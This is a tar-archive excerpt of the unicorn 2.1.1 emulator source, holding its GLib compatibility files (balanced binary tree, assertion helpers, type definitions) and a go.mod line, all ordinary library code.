g_slice_alloc0 (gsize block_size); gpointer g_slice_alloc (gsize block_size); void g_slice_free1 (gsize block_size, gpointer mem_block); #define g_slice_free(type, mem) \ G_STMT_START { \ if (1) g_slice_free1 (sizeof (type), (mem)); \ else (void) ((type*) 0 == (mem)); \ } G_STMT_END #endif /* __G_SLICE_H__ */ �������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/glib_compat/gtestutils.c��������������������������������������������������������������0000664�0000000�0000000�00000002165�14675241067�0020043�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* GLib testing utilities * Copyright (C) 2007 Imendio AB * Authors: Tim Janik, Sven Herzberg * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "gtestutils.h" #include <stdlib.h> #include <stdio.h> void g_assertion_message_expr (const char *file, int line, const char *expr) { if (!expr) printf("%s:%d code should not be reached", file, line); else printf("%s:%d assertion failed: %s", file, line, expr); abort(); } �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/glib_compat/gtestutils.h��������������������������������������������������������������0000664�0000000�0000000�00000004211�14675241067�0020042�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* GLib testing utilities * Copyright (C) 2007 Imendio AB * Authors: Tim Janik * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #ifndef __G_TEST_UTILS_H__ #define __G_TEST_UTILS_H__ #if !(defined (G_STMT_START) && defined (G_STMT_END)) #define G_STMT_START do #if defined (_MSC_VER) && (_MSC_VER >= 1500) #define G_STMT_END \ __pragma(warning(push)) \ __pragma(warning(disable:4127)) \ while(0) \ __pragma(warning(pop)) #else #define G_STMT_END while (0) #endif #endif #if __GNUC__ > 2 || (__GNUC__ == 2 && __GNUC_MINOR__ > 4) #define G_GNUC_NORETURN \ __attribute__((__noreturn__)) #else /* !__GNUC__ */ /* NOTE: MSVC has __declspec(noreturn) but unlike GCC __attribute__, * __declspec can only be placed at the start of the function prototype * and not at the end, so we can't use it without breaking API. */ #define G_GNUC_NORETURN #endif /* !__GNUC__ */ void g_assertion_message_expr (const char *file, int line, const char *expr) G_GNUC_NORETURN; #define g_assert_not_reached() G_STMT_START { g_assertion_message_expr (__FILE__, __LINE__, NULL); } G_STMT_END #define g_assert(expr) G_STMT_START { \ if (expr) ; else \ g_assertion_message_expr (__FILE__, __LINE__, #expr); \ } G_STMT_END #endif /* __G_TEST_UTILS_H__ */ ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/glib_compat/gtree.c�������������������������������������������������������������������0000664�0000000�0000000�00000077560�14675241067�0016755�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* GLIB - Library of useful routines for C programming * Copyright (C) 1995-1997 Peter Mattis, Spencer Kimball and Josh MacDonald * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* * Modified by the GLib Team and others 1997-2000. See the AUTHORS * file for a list of people on the GLib Team. See the ChangeLog * files for a list of changes. These files are distributed with * GLib at ftp://ftp.gtk.org/pub/gtk/. */ /* * MT safe */ #include "gtypes.h" #include "gtree.h" //#include "gatomic.h" //#include "gtestutils.h" #include "gslice.h" #include "gmessages.h" #include "gnode.h" /** * SECTION:trees-binary * @title: Balanced Binary Trees * @short_description: a sorted collection of key/value pairs optimized * for searching and traversing in order * * The #GTree structure and its associated functions provide a sorted * collection of key/value pairs optimized for searching and traversing * in order. * * To create a new #GTree use g_tree_new(). * * To insert a key/value pair into a #GTree use g_tree_insert(). * * To look up the value corresponding to a given key, use * g_tree_lookup() and g_tree_lookup_extended(). * * To find out the number of nodes in a #GTree, use g_tree_nnodes(). To * get the height of a #GTree, use g_tree_height(). * * To traverse a #GTree, calling a function for each node visited in * the traversal, use g_tree_foreach(). * * To remove a key/value pair use g_tree_remove(). * * To destroy a #GTree, use g_tree_destroy(). **/ #undef G_TREE_DEBUG #define MAX_GTREE_HEIGHT 40 typedef struct _GTreeNode GTreeNode; /** * GTree: * * The GTree struct is an opaque data structure representing a * [balanced binary tree][glib-Balanced-Binary-Trees]. It should be * accessed only by using the following functions. */ struct _GTree { GTreeNode *root; GCompareDataFunc key_compare; GDestroyNotify key_destroy_func; GDestroyNotify value_destroy_func; gpointer key_compare_data; guint nnodes; gint ref_count; }; struct _GTreeNode { gpointer key; /* key for this node */ gpointer value; /* value stored at this node */ GTreeNode *left; /* left subtree */ GTreeNode *right; /* right subtree */ gint8 balance; /* height (right) - height (left) */ guint8 left_child; guint8 right_child; }; static GTreeNode* g_tree_node_new (gpointer key, gpointer value); static void g_tree_insert_internal (GTree *tree, gpointer key, gpointer value, gboolean replace); static gboolean g_tree_remove_internal (GTree *tree, gconstpointer key, gboolean steal); static GTreeNode* g_tree_node_balance (GTreeNode *node); static GTreeNode *g_tree_find_node (GTree *tree, gconstpointer key); static gint g_tree_node_pre_order (GTreeNode *node, GTraverseFunc traverse_func, gpointer data); static gint g_tree_node_in_order (GTreeNode *node, GTraverseFunc traverse_func, gpointer data); static gint g_tree_node_post_order (GTreeNode *node, GTraverseFunc traverse_func, gpointer data); static gpointer g_tree_node_search (GTreeNode *node, GCompareFunc search_func, gconstpointer data); static GTreeNode* g_tree_node_rotate_left (GTreeNode *node); static GTreeNode* g_tree_node_rotate_right (GTreeNode *node); #ifdef G_TREE_DEBUG static void g_tree_node_check (GTreeNode *node); #endif static GTreeNode *g_tree_node_new (gpointer key, gpointer value) { GTreeNode *node = g_slice_new (GTreeNode); node->balance = 0; node->left = NULL; node->right = NULL; node->left_child = FALSE; node->right_child = FALSE; node->key = key; node->value = value; return node; } /** * g_tree_new: * @key_compare_func: the function used to order the nodes in the #GTree. * It should return values similar to the standard strcmp() function - * 0 if the two arguments are equal, a negative value if the first argument * comes before the second, or a positive value if the first argument comes * after the second. * * Creates a new #GTree. * * Returns: a newly allocated #GTree */ GTree *g_tree_new (GCompareFunc key_compare_func) { g_return_val_if_fail (key_compare_func != NULL, NULL); return g_tree_new_full ((GCompareDataFunc) key_compare_func, NULL, NULL, NULL); } /** * g_tree_new_with_data: * @key_compare_func: qsort()-style comparison function * @key_compare_data: data to pass to comparison function * * Creates a new #GTree with a comparison function that accepts user data. * See g_tree_new() for more details. * * Returns: a newly allocated #GTree */ GTree *g_tree_new_with_data (GCompareDataFunc key_compare_func, gpointer key_compare_data) { g_return_val_if_fail (key_compare_func != NULL, NULL); return g_tree_new_full (key_compare_func, key_compare_data, NULL, NULL); } /** * g_tree_new_full: * @key_compare_func: qsort()-style comparison function * @key_compare_data: data to pass to comparison function * @key_destroy_func: a function to free the memory allocated for the key * used when removing the entry from the #GTree or %NULL if you don't * want to supply such a function * @value_destroy_func: a function to free the memory allocated for the * value used when removing the entry from the #GTree or %NULL if you * don't want to supply such a function * * Creates a new #GTree like g_tree_new() and allows to specify functions * to free the memory allocated for the key and value that get called when * removing the entry from the #GTree. * * Returns: a newly allocated #GTree */ GTree *g_tree_new_full (GCompareDataFunc key_compare_func, gpointer key_compare_data, GDestroyNotify key_destroy_func, GDestroyNotify value_destroy_func) { GTree *tree; g_return_val_if_fail (key_compare_func != NULL, NULL); tree = g_slice_new (GTree); tree->root = NULL; tree->key_compare = key_compare_func; tree->key_destroy_func = key_destroy_func; tree->value_destroy_func = value_destroy_func; tree->key_compare_data = key_compare_data; tree->nnodes = 0; tree->ref_count = 1; return tree; } static inline GTreeNode *g_tree_first_node (GTree *tree) { GTreeNode *tmp; if (!tree->root) return NULL; tmp = tree->root; while (tmp->left_child) tmp = tmp->left; return tmp; } static inline GTreeNode *g_tree_node_previous (GTreeNode *node) { GTreeNode *tmp; tmp = node->left; if (node->left_child) while (tmp->right_child) tmp = tmp->right; return tmp; } static inline GTreeNode *g_tree_node_next (GTreeNode *node) { GTreeNode *tmp; tmp = node->right; if (node->right_child) while (tmp->left_child) tmp = tmp->left; return tmp; } void g_tree_remove_all (GTree *tree) { GTreeNode *node; GTreeNode *next; g_return_if_fail (tree != NULL); node = g_tree_first_node (tree); while (node) { next = g_tree_node_next (node); if (tree->key_destroy_func) tree->key_destroy_func (node->key); if (tree->value_destroy_func) tree->value_destroy_func (node->value); g_slice_free (GTreeNode, node); node = next; } tree->root = NULL; tree->nnodes = 0; } /** * g_tree_ref: * @tree: a #GTree * * Increments the reference count of @tree by one. * * It is safe to call this function from any thread. * * Returns: the passed in #GTree * * Since: 2.22 */ GTree *g_tree_ref (GTree *tree) { g_return_val_if_fail (tree != NULL, NULL); tree->ref_count++; return tree; } /** * g_tree_unref: * @tree: a #GTree * * Decrements the reference count of @tree by one. * If the reference count drops to 0, all keys and values will * be destroyed (if destroy functions were specified) and all * memory allocated by @tree will be released. * * It is safe to call this function from any thread. * * Since: 2.22 */ void g_tree_unref (GTree *tree) { g_return_if_fail (tree != NULL); tree->ref_count--; if (!tree->ref_count) { g_tree_remove_all (tree); g_slice_free (GTree, tree); } } /** * g_tree_destroy: * @tree: a #GTree * * Removes all keys and values from the #GTree and decreases its * reference count by one. If keys and/or values are dynamically * allocated, you should either free them first or create the #GTree * using g_tree_new_full(). In the latter case the destroy functions * you supplied will be called on all keys and values before destroying * the #GTree. */ void g_tree_destroy (GTree *tree) { g_return_if_fail (tree != NULL); g_tree_remove_all (tree); g_tree_unref (tree); } /** * g_tree_insert: * @tree: a #GTree * @key: the key to insert * @value: the value corresponding to the key * * Inserts a key/value pair into a #GTree. * * If the given key already exists in the #GTree its corresponding value * is set to the new value. If you supplied a @value_destroy_func when * creating the #GTree, the old value is freed using that function. If * you supplied a @key_destroy_func when creating the #GTree, the passed * key is freed using that function. * * The tree is automatically 'balanced' as new key/value pairs are added, * so that the distance from the root to every leaf is as small as possible. */ void g_tree_insert (GTree *tree, gpointer key, gpointer value) { g_return_if_fail (tree != NULL); g_tree_insert_internal (tree, key, value, FALSE); #ifdef G_TREE_DEBUG g_tree_node_check (tree->root); #endif } /** * g_tree_replace: * @tree: a #GTree * @key: the key to insert * @value: the value corresponding to the key * * Inserts a new key and value into a #GTree similar to g_tree_insert(). * The difference is that if the key already exists in the #GTree, it gets * replaced by the new key. If you supplied a @value_destroy_func when * creating the #GTree, the old value is freed using that function. If you * supplied a @key_destroy_func when creating the #GTree, the old key is * freed using that function. * * The tree is automatically 'balanced' as new key/value pairs are added, * so that the distance from the root to every leaf is as small as possible. */ void g_tree_replace (GTree *tree, gpointer key, gpointer value) { g_return_if_fail (tree != NULL); g_tree_insert_internal (tree, key, value, TRUE); #ifdef G_TREE_DEBUG g_tree_node_check (tree->root); #endif } /* internal insert routine */ static void g_tree_insert_internal (GTree *tree, gpointer key, gpointer value, gboolean replace) { GTreeNode *node; GTreeNode *path[MAX_GTREE_HEIGHT]; int idx; g_return_if_fail (tree != NULL); if (!tree->root) { tree->root = g_tree_node_new (key, value); tree->nnodes++; return; } idx = 0; path[idx++] = NULL; node = tree->root; while (1) { int cmp = tree->key_compare (key, node->key, tree->key_compare_data); if (cmp == 0) { if (tree->value_destroy_func) tree->value_destroy_func (node->value); node->value = value; if (replace) { if (tree->key_destroy_func) tree->key_destroy_func (node->key); node->key = key; } else { /* free the passed key */ if (tree->key_destroy_func) tree->key_destroy_func (key); } return; } else if (cmp < 0) { if (node->left_child) { path[idx++] = node; node = node->left; } else { GTreeNode *child = g_tree_node_new (key, value); child->left = node->left; child->right = node; node->left = child; node->left_child = TRUE; node->balance -= 1; tree->nnodes++; break; } } else { if (node->right_child) { path[idx++] = node; node = node->right; } else { GTreeNode *child = g_tree_node_new (key, value); child->right = node->right; child->left = node; node->right = child; node->right_child = TRUE; node->balance += 1; tree->nnodes++; break; } } } /* Restore balance. This is the goodness of a non-recursive * implementation, when we are done with balancing we 'break' * the loop and we are done. */ while (1) { GTreeNode *bparent = path[--idx]; gboolean left_node = (bparent && node == bparent->left); //g_assert (!bparent || bparent->left == node || bparent->right == node); if (node->balance < -1 || node->balance > 1) { node = g_tree_node_balance (node); if (bparent == NULL) tree->root = node; else if (left_node) bparent->left = node; else bparent->right = node; } if (node->balance == 0 || bparent == NULL) break; if (left_node) bparent->balance -= 1; else bparent->balance += 1; node = bparent; } } /** * g_tree_remove: * @tree: a #GTree * @key: the key to remove * * Removes a key/value pair from a #GTree. * * If the #GTree was created using g_tree_new_full(), the key and value * are freed using the supplied destroy functions, otherwise you have to * make sure that any dynamically allocated values are freed yourself. * If the key does not exist in the #GTree, the function does nothing. * * Returns: %TRUE if the key was found (prior to 2.8, this function * returned nothing) */ gboolean g_tree_remove (GTree *tree, gconstpointer key) { gboolean removed; g_return_val_if_fail (tree != NULL, FALSE); removed = g_tree_remove_internal (tree, key, FALSE); #ifdef G_TREE_DEBUG g_tree_node_check (tree->root); #endif return removed; } /** * g_tree_steal: * @tree: a #GTree * @key: the key to remove * * Removes a key and its associated value from a #GTree without calling * the key and value destroy functions. * * If the key does not exist in the #GTree, the function does nothing. * * Returns: %TRUE if the key was found (prior to 2.8, this function * returned nothing) */ gboolean g_tree_steal (GTree *tree, gconstpointer key) { gboolean removed; g_return_val_if_fail (tree != NULL, FALSE); removed = g_tree_remove_internal (tree, key, TRUE); #ifdef G_TREE_DEBUG g_tree_node_check (tree->root); #endif return removed; } /* internal remove routine */ static gboolean g_tree_remove_internal (GTree *tree, gconstpointer key, gboolean steal) { GTreeNode *node, *parent, *balance; GTreeNode *path[MAX_GTREE_HEIGHT]; int idx; gboolean left_node; g_return_val_if_fail (tree != NULL, FALSE); if (!tree->root) return FALSE; idx = 0; path[idx++] = NULL; node = tree->root; while (1) { int cmp = tree->key_compare (key, node->key, tree->key_compare_data); if (cmp == 0) break; else if (cmp < 0) { if (!node->left_child) return FALSE; path[idx++] = node; node = node->left; } else { if (!node->right_child) return FALSE; path[idx++] = node; node = node->right; } } /* The following code is almost equal to g_tree_remove_node, * except that we do not have to call g_tree_node_parent. */ balance = parent = path[--idx]; //g_assert (!parent || parent->left == node || parent->right == node); left_node = (parent && node == parent->left); if (!node->left_child) { if (!node->right_child) { if (!parent) tree->root = NULL; else if (left_node) { parent->left_child = FALSE; parent->left = node->left; parent->balance += 1; } else { parent->right_child = FALSE; parent->right = node->right; parent->balance -= 1; } } else /* node has a right child */ { GTreeNode *tmp = g_tree_node_next (node); tmp->left = node->left; if (!parent) tree->root = node->right; else if (left_node) { parent->left = node->right; parent->balance += 1; } else { parent->right = node->right; parent->balance -= 1; } } } else /* node has a left child */ { if (!node->right_child) { GTreeNode *tmp = g_tree_node_previous (node); tmp->right = node->right; if (parent == NULL) tree->root = node->left; else if (left_node) { parent->left = node->left; parent->balance += 1; } else { parent->right = node->left; parent->balance -= 1; } } else /* node has a both children (pant, pant!) */ { GTreeNode *prev = node->left; GTreeNode *next = node->right; GTreeNode *nextp = node; int old_idx = idx + 1; idx++; /* path[idx] == parent */ /* find the immediately next node (and its parent) */ while (next->left_child) { path[++idx] = nextp = next; next = next->left; } path[old_idx] = next; balance = path[idx]; /* remove 'next' from the tree */ if (nextp != node) { if (next->right_child) nextp->left = next->right; else nextp->left_child = FALSE; nextp->balance += 1; next->right_child = TRUE; next->right = node->right; } else node->balance -= 1; /* set the prev to point to the right place */ while (prev->right_child) prev = prev->right; prev->right = next; /* prepare 'next' to replace 'node' */ next->left_child = TRUE; next->left = node->left; next->balance = node->balance; if (!parent) tree->root = next; else if (left_node) parent->left = next; else parent->right = next; } } /* restore balance */ if (balance) while (1) { GTreeNode *bparent = path[--idx]; //g_assert (!bparent || bparent->left == balance || bparent->right == balance); left_node = (bparent && balance == bparent->left); if(balance->balance < -1 || balance->balance > 1) { balance = g_tree_node_balance (balance); if (!bparent) tree->root = balance; else if (left_node) bparent->left = balance; else bparent->right = balance; } if (balance->balance != 0 || !bparent) break; if (left_node) bparent->balance += 1; else bparent->balance -= 1; balance = bparent; } if (!steal) { if (tree->key_destroy_func) tree->key_destroy_func (node->key); if (tree->value_destroy_func) tree->value_destroy_func (node->value); } g_slice_free (GTreeNode, node); tree->nnodes--; return TRUE; } /** * g_tree_lookup: * @tree: a #GTree * @key: the key to look up * * Gets the value corresponding to the given key. Since a #GTree is * automatically balanced as key/value pairs are added, key lookup * is O(log n) (where n is the number of key/value pairs in the tree). * * Returns: the value corresponding to the key, or %NULL * if the key was not found */ gpointer g_tree_lookup (GTree *tree, gconstpointer key) { GTreeNode *node; g_return_val_if_fail (tree != NULL, NULL); node = g_tree_find_node (tree, key); return node ? node->value : NULL; } /** * g_tree_lookup_extended: * @tree: a #GTree * @lookup_key: the key to look up * @orig_key: (out) (optional) (nullable): returns the original key * @value: (out) (optional) (nullable): returns the value associated with the key * * Looks up a key in the #GTree, returning the original key and the * associated value. This is useful if you need to free the memory * allocated for the original key, for example before calling * g_tree_remove(). * * Returns: %TRUE if the key was found in the #GTree */ gboolean g_tree_lookup_extended (GTree *tree, gconstpointer lookup_key, gpointer *orig_key, gpointer *value) { GTreeNode *node; g_return_val_if_fail (tree != NULL, FALSE); node = g_tree_find_node (tree, lookup_key); if (node) { if (orig_key) *orig_key = node->key; if (value) *value = node->value; return TRUE; } else return FALSE; } /** * g_tree_foreach: * @tree: a #GTree * @func: the function to call for each node visited. * If this function returns %TRUE, the traversal is stopped. * @user_data: user data to pass to the function * * Calls the given function for each of the key/value pairs in the #GTree. * The function is passed the key and value of each pair, and the given * @data parameter. The tree is traversed in sorted order. * * The tree may not be modified while iterating over it (you can't * add/remove items). To remove all items matching a predicate, you need * to add each item to a list in your #GTraverseFunc as you walk over * the tree, then walk the list and remove each item. */ void g_tree_foreach (GTree *tree, GTraverseFunc func, gpointer user_data) { GTreeNode *node; g_return_if_fail (tree != NULL); if (!tree->root) return; node = g_tree_first_node (tree); while (node) { if ((*func) (node->key, node->value, user_data)) break; node = g_tree_node_next (node); } } /** * g_tree_traverse: * @tree: a #GTree * @traverse_func: the function to call for each node visited. If this * function returns %TRUE, the traversal is stopped. * @traverse_type: the order in which nodes are visited, one of %G_IN_ORDER, * %G_PRE_ORDER and %G_POST_ORDER * @user_data: user data to pass to the function * * Calls the given function for each node in the #GTree. * * Deprecated:2.2: The order of a balanced tree is somewhat arbitrary. * If you just want to visit all nodes in sorted order, use * g_tree_foreach() instead. If you really need to visit nodes in * a different order, consider using an [n-ary tree][glib-N-ary-Trees]. */ /** * GTraverseFunc: * @key: a key of a #GTree node * @value: the value corresponding to the key * @data: user data passed to g_tree_traverse() * * Specifies the type of function passed to g_tree_traverse(). It is * passed the key and value of each node, together with the @user_data * parameter passed to g_tree_traverse(). If the function returns * %TRUE, the traversal is stopped. * * Returns: %TRUE to stop the traversal */ void g_tree_traverse (GTree *tree, GTraverseFunc traverse_func, GTraverseType traverse_type, gpointer user_data) { g_return_if_fail (tree != NULL); if (!tree->root) return; switch (traverse_type) { case G_PRE_ORDER: g_tree_node_pre_order (tree->root, traverse_func, user_data); break; case G_IN_ORDER: g_tree_node_in_order (tree->root, traverse_func, user_data); break; case G_POST_ORDER: g_tree_node_post_order (tree->root, traverse_func, user_data); break; case G_LEVEL_ORDER: //g_warning ("g_tree_traverse(): traverse type G_LEVEL_ORDER isn't implemented."); break; } } /** * g_tree_search: * @tree: a #GTree * @search_func: a function used to search the #GTree * @user_data: the data passed as the second argument to @search_func * * Searches a #GTree using @search_func. * * The @search_func is called with a pointer to the key of a key/value * pair in the tree, and the passed in @user_data. If @search_func returns * 0 for a key/value pair, then the corresponding value is returned as * the result of g_tree_search(). If @search_func returns -1, searching * will proceed among the key/value pairs that have a smaller key; if * @search_func returns 1, searching will proceed among the key/value * pairs that have a larger key. * * Returns: the value corresponding to the found key, or %NULL * if the key was not found */ gpointer g_tree_search (GTree *tree, GCompareFunc search_func, gconstpointer user_data) { g_return_val_if_fail (tree != NULL, NULL); if (tree->root) return g_tree_node_search (tree->root, search_func, user_data); else return NULL; } /** * g_tree_height: * @tree: a #GTree * * Gets the height of a #GTree. * * If the #GTree contains no nodes, the height is 0. * If the #GTree contains only one root node the height is 1. * If the root node has children the height is 2, etc. * * Returns: the height of @tree */ gint g_tree_height (GTree *tree) { GTreeNode *node; gint height; g_return_val_if_fail (tree != NULL, 0); if (!tree->root) return 0; height = 0; node = tree->root; while (1) { height += 1 + MAX(node->balance, 0); if (!node->left_child) return height; node = node->left; } } /** * g_tree_nnodes: * @tree: a #GTree * * Gets the number of nodes in a #GTree. * * Returns: the number of nodes in @tree */ gint g_tree_nnodes (GTree *tree) { g_return_val_if_fail (tree != NULL, 0); return tree->nnodes; } static GTreeNode *g_tree_node_balance (GTreeNode *node) { if (node->balance < -1) { if (node->left->balance > 0) node->left = g_tree_node_rotate_left (node->left); node = g_tree_node_rotate_right (node); } else if (node->balance > 1) { if (node->right->balance < 0) node->right = g_tree_node_rotate_right (node->right); node = g_tree_node_rotate_left (node); } return node; } static GTreeNode *g_tree_find_node (GTree *tree, gconstpointer key) { GTreeNode *node; gint cmp; node = tree->root; if (!node) return NULL; while (1) { cmp = tree->key_compare (key, node->key, tree->key_compare_data); if (cmp == 0) return node; else if (cmp < 0) { if (!node->left_child) return NULL; node = node->left; } else { if (!node->right_child) return NULL; node = node->right; } } } static gint g_tree_node_pre_order (GTreeNode *node, GTraverseFunc traverse_func, gpointer data) { if ((*traverse_func) (node->key, node->value, data)) return TRUE; if (node->left_child) { if (g_tree_node_pre_order (node->left, traverse_func, data)) return TRUE; } if (node->right_child) { if (g_tree_node_pre_order (node->right, traverse_func, data)) return TRUE; } return FALSE; } static gint g_tree_node_in_order (GTreeNode *node, GTraverseFunc traverse_func, gpointer data) { if (node->left_child) { if (g_tree_node_in_order (node->left, traverse_func, data)) return TRUE; } if ((*traverse_func) (node->key, node->value, data)) return TRUE; if (node->right_child) { if (g_tree_node_in_order (node->right, traverse_func, data)) return TRUE; } return FALSE; } static gint g_tree_node_post_order (GTreeNode *node, GTraverseFunc traverse_func, gpointer data) { if (node->left_child) { if (g_tree_node_post_order (node->left, traverse_func, data)) return TRUE; } if (node->right_child) { if (g_tree_node_post_order (node->right, traverse_func, data)) return TRUE; } if ((*traverse_func) (node->key, node->value, data)) return TRUE; return FALSE; } static gpointer g_tree_node_search (GTreeNode *node, GCompareFunc search_func, gconstpointer data) { gint dir; if (!node) return NULL; while (1) { dir = (* search_func) (node->key, data); if (dir == 0) return node->value; else if (dir < 0) { if (!node->left_child) return NULL; node = node->left; } else { if (!node->right_child) return NULL; node = node->right; } } } static GTreeNode *g_tree_node_rotate_left (GTreeNode *node) { GTreeNode *right; gint a_bal; gint b_bal; right = node->right; if (right->left_child) node->right = right->left; else { node->right_child = FALSE; right->left_child = TRUE; } right->left = node; a_bal = node->balance; b_bal = right->balance; if (b_bal <= 0) { if (a_bal >= 1) right->balance = b_bal - 1; else right->balance = a_bal + b_bal - 2; node->balance = a_bal - 1; } else { if (a_bal <= b_bal) right->balance = a_bal - 2; else right->balance = b_bal - 1; node->balance = a_bal - b_bal - 1; } return right; } static GTreeNode *g_tree_node_rotate_right (GTreeNode *node) { GTreeNode *left; gint a_bal; gint b_bal; left = node->left; if (left->right_child) node->left = left->right; else { node->left_child = FALSE; left->right_child = TRUE; } left->right = node; a_bal = node->balance; b_bal = left->balance; if (b_bal <= 0) { if (b_bal > a_bal) left->balance = b_bal + 1; else left->balance = a_bal + 2; node->balance = a_bal - b_bal + 1; } else { if (a_bal <= -1) left->balance = b_bal + 1; else left->balance = a_bal + b_bal + 2; node->balance = a_bal + 1; } return left; } ������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/glib_compat/gtree.h�������������������������������������������������������������������0000664�0000000�0000000�00000003620�14675241067�0016744�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* GLIB - Library of useful routines for C programming * Copyright (C) 1995-1997 Peter Mattis, Spencer Kimball and Josh MacDonald * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* * Modified by the GLib Team and others 1997-2000. See the AUTHORS * file for a list of people on the GLib Team. See the ChangeLog * files for a list of changes. These files are distributed with * GLib at ftp://ftp.gtk.org/pub/gtk/. */ #ifndef __G_TREE_H__ #define __G_TREE_H__ typedef struct _GTree GTree; typedef gboolean (*GTraverseFunc) (gpointer key, gpointer value, gpointer data); /* Balanced binary trees */ GTree* g_tree_new (GCompareFunc key_compare_func); GTree* g_tree_new_full (GCompareDataFunc key_compare_func, gpointer key_compare_data, GDestroyNotify key_destroy_func, GDestroyNotify value_destroy_func); GTree* g_tree_ref (GTree *tree); void g_tree_destroy (GTree *tree); void g_tree_insert (GTree *tree, gpointer key, gpointer value); void g_tree_remove_all (GTree *tree); gboolean g_tree_remove (GTree *tree, gconstpointer key); gpointer g_tree_lookup (GTree *tree, gconstpointer key); void g_tree_foreach (GTree *tree, GTraverseFunc func, gpointer user_data); gint g_tree_nnodes (GTree *tree); #endif /* __G_TREE_H__ */ ����������������������������������������������������������������������������������������������������������������unicorn-2.1.1/glib_compat/gtypes.h������������������������������������������������������������������0000664�0000000�0000000�00000004517�14675241067�0017157�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* GLIB - Library of useful routines for C programming * Copyright (C) 1995-1997 Peter Mattis, Spencer Kimball and Josh MacDonald * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* * Modified by the GLib Team and others 1997-2000. See the AUTHORS * file for a list of people on the GLib Team. See the ChangeLog * files for a list of changes. These files are distributed with * GLib at ftp://ftp.gtk.org/pub/gtk/. */ #ifndef __G_TYPES_H__ #define __G_TYPES_H__ #include <stddef.h> #include <stdint.h> #include <float.h> #ifndef TRUE #define TRUE 1 #endif #ifndef FALSE #define FALSE 0 #endif #define MAX(a, b) (((a) > (b)) ? (a) : (b)) /* typedefs for glib related types that may still be referenced */ typedef void* gpointer; typedef const void *gconstpointer; typedef int gint; typedef uint8_t guint8; typedef int8_t gint8; typedef uint16_t guint16; typedef int16_t gint16; typedef uint32_t guint32; typedef int32_t gint32; typedef uint64_t guint64; typedef int64_t gint64; typedef unsigned int guint; typedef char gchar; typedef int gboolean; typedef unsigned long gulong; typedef unsigned long gsize; typedef gint grefcount; typedef volatile gint gatomicrefcount; typedef void (*GDestroyNotify) (gpointer data); typedef gint (*GCompareFunc) (gconstpointer a, gconstpointer b); typedef gint (*GCompareDataFunc) (gconstpointer a, gconstpointer b, gpointer user_data); typedef guint (*GHashFunc) (gconstpointer key); typedef gboolean (*GEqualFunc) (gconstpointer a, gconstpointer b); typedef void (*GHFunc) (gpointer key, gpointer value, gpointer user_data); typedef gpointer (*GCopyFunc) (gconstpointer src, gpointer data); #endif /* __G_TYPES_H__ */ ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/go.mod��������������������������������������������������������������������������������0000664�0000000�0000000�00000000063�14675241067�0014311�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������module github.com/unicorn-engine/unicorn go 1.17 